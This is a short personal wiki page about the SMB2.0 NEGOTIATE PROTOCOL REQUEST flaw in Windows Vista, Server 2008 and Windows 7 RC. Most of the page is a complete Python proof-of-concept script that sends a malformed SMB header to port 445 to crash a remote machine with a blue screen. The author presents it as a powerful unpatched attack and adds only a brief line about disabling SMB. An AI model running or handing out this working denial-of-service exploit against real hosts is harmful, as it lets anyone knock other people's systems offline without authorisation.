Invoke a BSoD on Windows Vista

From TomSchaefer.org Wiki

Windows Vista, Server 2008 and 2008 R2 or 7 RC are vulnerable to a SMB2.0 attack. SMB2.0 can be attacked to cause a remote BSoD.

Windows Vista and newer windows OSs come with a newer version of SMB named SMB2. This is an SMB2 security issue that is caused because of a MS patch for another SMB2.0 security issue. Basically SRV2.sys fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST function.

Here is a sample Python script that can be used to attack.

   #!/usr/bin/python
   #When SMB2.0 receive a "&" char in the "Process Id High" SMB header field
   #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
   from socket import socket
   from time import sleep
   host = "IP_ADDR", 445
   buff = (
   "\x00\x00\x00\x90" # Begin SMB header: Session message
   "\xff\x53\x4d\x42" # Server Component: SMB
   "\x72\x00\x00\x00" # Negotiate Protocol
   "\x00\x18\x53\xc8" # Operation 0×18 & sub 0xc853
   "\x00\x26"# Process ID High: –> :) normal value should be "\x00\x00"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
   "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
   "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
   "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
   "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
   "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
   "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
   "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
   "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
   "\x30\x30\x32\x00"
   )
   s = socket()
   s.connect(host)
   s.send(buff)
   s.close()

No patch is available that I know of at the time of this writing. So this is a very powerful attack right now. What you can do is stop SMB features and ports.